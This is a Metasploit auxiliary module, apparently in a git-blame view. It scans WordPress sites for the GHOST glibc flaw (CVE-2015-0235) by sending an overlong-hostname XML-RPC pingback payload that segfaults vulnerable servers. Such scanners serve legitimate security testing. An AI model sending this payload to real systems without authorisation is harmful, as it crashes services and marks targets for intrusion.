2015-01-30 14:29:51 +00:00
|
|
|
##
|
2017-07-24 13:26:21 +00:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2015-01-30 14:29:51 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Auxiliary
|
2015-10-15 16:47:13 +00:00
|
|
|
include Msf::Exploit::Remote::HTTP::Wordpress
|
2015-01-30 14:29:51 +00:00
|
|
|
include Msf::Auxiliary::Scanner
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
2015-02-05 18:36:47 +00:00
|
|
|
'Name' => 'WordPress XMLRPC GHOST Vulnerability Scanner',
|
2015-01-30 14:29:51 +00:00
|
|
|
'Description' => %q{
|
2015-02-05 18:36:47 +00:00
|
|
|
This module can be used to determine hosts vulnerable to the GHOST vulnerability via
|
2015-01-30 14:29:51 +00:00
|
|
|
a call to the WordPress XMLRPC interface. If the target is vulnerable, the system
|
2015-02-05 18:36:47 +00:00
|
|
|
will segfault and return a server error. On patched systems, a normal XMLRPC error
|
2015-01-30 14:29:51 +00:00
|
|
|
is returned.
|
|
|
|
},
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'Robert Rowley',
|
|
|
|
'Christophe De La Fuente' ,
|
|
|
|
'Chaim Sanders' ,
|
|
|
|
'Felipe Costa' ,
|
|
|
|
'Jonathan Claudius' ,
|
|
|
|
'Karl Sigler' ,
|
|
|
|
'Christian Mehlmauer' # metasploit module
|
|
|
|
],
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'CVE', '2015-0235' ],
|
|
|
|
[ 'URL', 'http://blog.spiderlabs.com/2015/01/ghost-gethostbyname-heap-overflow-in-glibc-cve-2015-0235.html'],
|
|
|
|
[ 'URL', 'http://blog.sucuri.net/2015/01/critical-ghost-vulnerability-released.html']
|
|
|
|
]
|
|
|
|
))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
2015-01-30 14:57:32 +00:00
|
|
|
OptInt.new('LENGTH', [false, 'Payload length', 2500]),
|
2017-05-03 20:42:21 +00:00
|
|
|
])
|
2015-01-30 14:29:51 +00:00
|
|
|
end
|
2015-01-30 14:41:11 +00:00
|
|
|
|
2015-01-30 14:57:32 +00:00
|
|
|
def length
|
|
|
|
datastore['LENGTH']
|
2015-01-30 14:29:51 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def run_host(ip)
|
|
|
|
unless wordpress_and_online?
|
2016-02-01 22:06:34 +00:00
|
|
|
print_error("Looks like this site is no WordPress blog")
|
2015-01-30 14:29:51 +00:00
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
unless wordpress_xmlrpc_enabled?
|
2016-02-01 22:06:34 +00:00
|
|
|
print_error("XMLRPC interface is not enabled")
|
2015-01-30 14:29:51 +00:00
|
|
|
return
|
|
|
|
end
|
|
|
|
|
2015-01-30 14:57:32 +00:00
|
|
|
ghost = "0" * length
|
2015-01-30 14:29:51 +00:00
|
|
|
payload = "http://#{ghost}/#{Rex::Text.rand_text_alpha(7)}.php"
|
|
|
|
xml = wordpress_generate_xml_rpc_body('pingback.ping', payload, payload)
|
|
|
|
|
|
|
|
res = send_request_cgi(
|
|
|
|
'uri' => wordpress_url_xmlrpc,
|
|
|
|
'method' => 'POST',
|
|
|
|
'ctype' => 'text/xml;charset=UTF-8',
|
|
|
|
'data' => xml
|
|
|
|
)
|
|
|
|
|
|
|
|
if res.nil? || res.code == 500
|
2016-02-01 22:06:34 +00:00
|
|
|
print_good("vulnerable to GHOST")
|
2015-01-30 14:29:51 +00:00
|
|
|
report_vuln(
|
2015-01-30 14:57:32 +00:00
|
|
|
:host => ip,
|
|
|
|
:proto => 'tcp',
|
|
|
|
:port => datastore['RPORT'],
|
|
|
|
:name => self.name,
|
|
|
|
:info => "Module #{self.fullname} found GHOST vulnerability",
|
|
|
|
:sname => datastore['SSL'] ? "https" : "http"
|
2015-01-30 14:29:51 +00:00
|
|
|
)
|
|
|
|
else
|
2016-02-01 22:06:34 +00:00
|
|
|
print_status("target not vulnerable to GHOST")
|
2015-01-30 14:29:51 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|